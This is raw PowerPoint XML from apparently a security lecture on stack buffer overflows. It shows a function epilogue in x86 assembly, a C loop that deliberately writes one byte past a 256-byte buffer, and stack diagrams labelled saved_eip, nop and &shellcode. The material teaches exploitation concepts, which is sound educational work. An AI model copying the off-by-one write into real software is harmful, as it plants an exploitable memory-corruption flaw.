        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286882" y="2105300"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5529001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0741" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1140742" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140743" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140744" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140745" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140747" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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40748" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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40749" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140750" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140751" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140752" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140753" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140754" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140755" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140756" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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40757" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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40758" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140759" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140760" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1140763" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140755" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2590800" y="4900821"/>
            <a:ext cx="3886200" cy="842754"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1140764" name="AutoShape 28"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140754" idx="1"/>
            <a:endCxn id="1140743" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="3114675"/>
            <a:ext cx="1588" cy="2343150"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -48800005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1140765" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1140753" idx="1"/>
            <a:endCxn id="1140750" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="2257425"/>
            <a:ext cx="1588" cy="2914650"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -14400000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140766" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140767" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="2400300"/>
            <a:ext cx="533400" cy="285750"/>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3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286882" y="2105300"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1165177511"/>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2789" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1142790" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142791" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142792" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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nop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142793" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
